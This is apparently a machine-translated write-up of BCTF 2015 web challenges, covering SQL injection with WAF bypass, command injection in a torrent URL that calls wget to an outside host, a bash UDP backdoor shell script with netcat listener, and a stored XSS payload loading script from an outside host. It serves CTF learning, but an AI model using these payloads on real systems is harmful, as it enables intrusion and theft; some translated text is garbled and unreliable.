BCTF 2015 WEB Question clearance strategy (Writeup)

BCTF 2015 WEB Question clearance strategy (Writeup)

About bctf:

BCTF is a network security challenge held by the Blue Lotus team. It was only available in China last year and will be open to the whole world from this year. We welcome our partners from all over the world! We will reward the winners.

This year's BCTF is also one of the XCTF standbys of the national cybersecurity technology competition league. The winning Chinese XCTF team will be promoted directly to the XCTF finals in Nanjing (the finals will also be proposed by the Blue Lotus team ). Other participating XCTF teams will also earn points to compete for other seats in the XCTF finals.

217: PPP and tomcr00se won the first three.

There are mainly the following questions:

 

Checkin 10

Desc: Please checkin at IRC

IRC: http://webchat.freenode.net/Channels: bctf

Bulletin board:

[BCTF 2015 has started. Check in flag: OPGS{jr1p0zr-g0-OPGS-2015_t00q-yhpx}.

 

Rot13 decode:

OPGS{jr1p0zr-g0-OPGS-2015_t00q-yhpx} <--> BCTF{we1c0me-t0-BCTF-2015_g00d-luck}

 

Sqli_engineScore 200

 

 

Desc:

Http: // 104.197.7.111: 8080/

Geohot told me he has a lot of SQL injection tricks. So I wrote a SQL injection detection engine in defense.

Now you have a simple website protected by my engine, try to steal the admin's password (not hash ).

Username, Password: SQLi

<form id="submit-form" class="form-group" action="/register" method="POST">    <input type="text" placeholder="username" class="form-control" name="username"/>    <input type="password" placeholder="password" class="form-control" name="password"/>    <span class="input-icon fui-check-inverted"></span>    <br />    <div class="row">      <div class="col-xs-3"> <button type="submit" class="btn btn-block btn-lg btn-primary">Register</button> </div>      Already registered?<a href="/static/login.html">Click Here to Login</a>    </div>    <br />  </form

SQL Injection:

URL: http://104.197.7.111:8080/registerPOST: username=admin&password=,'error executing sql: insert into users (username, password) values ('admin', ','')(1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '','')' at line 1")

Continue:

Continue:username=admin\&password=,updatexml(1,(select password from users limit 1),1) or 'password contains SQL injection, IP recorded.

 

Bypass WAF:

username=admin\&password=,updatexml(1,(/*/*/select password from/*/*/users limit/*/*/1),1) or/*/*/'(1105, "XPATH syntax error: '{h0w-d1d-y0u-fee1-l1ke-th3-sql1-'")

 

Substring right:

username=admin\&password=,updatexml(1,(/*/*/select right(password,33)/*/*/from/*/*/users limit/*/*/1),1) or/*/*/'(1105, "XPATH syntax error: 'd-y0u-fee1-l1ke-th3-sql1-eng1ne}'")

 

String concatenation (FLAG ):

{h0w-d1d-y0u-fee1-l1ke-th3-sql1-eng1ne}

 

Torrent_loverScore 233

Desc: A dog loves torrent.

 

 

 

Http: // 218.2.197.253/zhongzi/index. php:

 

We guess, Maybe the command execution, The program callthe system function? Because we have no other way.

Testing:

http://www.google.com/`wget worm.cc:8000`/1.torrenthttp://www.google.com/`wget${IFS}worm.cc:8000`/1.torrent

 

We have received req (404 ):

root@e:/rootkit# python -m SimpleHTTPServerServing HTTP on 0.0.0.0 port 8000 ...118.186.202.142 - - [22/Mar/2015 13:44:39] "GET / HTTP/1.1" 200 -118.186.202.142 - - [22/Mar/2015 13:44:41] code 404, message File not found

 

Ubd. sh:

#!/bin/bashexec 9<> /dev/udp/localhost/8088[ $? -eq 1 ] && exitecho "connect ok" >&9while :do  a=`dd bs=200 count=1 <&9 2>/dev/null`  if echo "$a"|grep "exit"; then break; fi  echo `$a` >&9doneexec 9>&-exec 9<&-

 

Nc-lu8088

 

Find use_me_to_read_flag and flag:

/var/www/flag/use_me_to_read_flag /var/www/flag/flag>_ Permission denied

 

IDA, see _ strstr "flag ":

 

Cat FLAG:

ln -s /var/www/flag/flag /tmp/warning/var/www/flag/use_me_to_read_flag /tmp/warning

 

 

Web chat 325

Desc: http: // 146.148.60.107: 9991/

 

Websocket XSS? SQL Injection?

View-source:

<script>    $(document).ready(    function() {        function connect() {            $("#status").text("Connecting");            $("#status").attr("class", "text-primary");            var ws = new window.WebSocket('ws://' + location.host + '/ws');            ws.onopen = function() { $("#status").attr('class', 'text-success').text('Connected');                 $("#submit_btn").attr('disabled', false).click(function() {                    $("#sendstatus").attr('class', 'text-primary').text('Sending...');                    ws.send($("#i_nick").val() + ": " + $("#i_msg").val());                });            }            ws.onclose = function() { $("#status").attr('class', 'text-danger').text('Disconnected'); setTimeout(connect, 5000);}            ws.onerror = function() { $("#status").attr('class', 'text-danger').text('Failed to connect.'); }            ws.onmessage = function(datad) {                var data = datad.data;                if (data[0] == 'm') $("#msg").html(data.substr(1) + "<br/>" +  $("#msg").html());                if (data[0] == 's') { $("#i_msg").val(''); $("#sendstatus").attr('class', 'text-success').text('Message Sent');}                if (data[0] == 'e') { $("#i_msg").val(''); $("#sendstatus").attr('class', 'text-danger').text('Message Rejected');}            }        }        connect();    });</script> 

 

Http://ironwasp.org/cswsh.html ws: // 146.148.60.107: 9991/ws

 

mysql> select hex('<script src=http://xss.net/0TLs5n?1426923466></script>');+--------------------------------------------------------------+| hex('<script src=http://xss.net/0TLs5n?1426923466></script>')                                                         |+--------------------------------------------------------------+| 3C73637269707***********3D687474703A2F2F7873732E6861636B7461736B2E6E65742F30544C73356E3F|+--------------------------------------------------------------+test: '),(0x3C73637269707***********3D687474703A2F2F7873732E6861636B7461736B2E6E65742F30544C73356E3F),('

 

Http: // 146.148.60.107: 9991/review?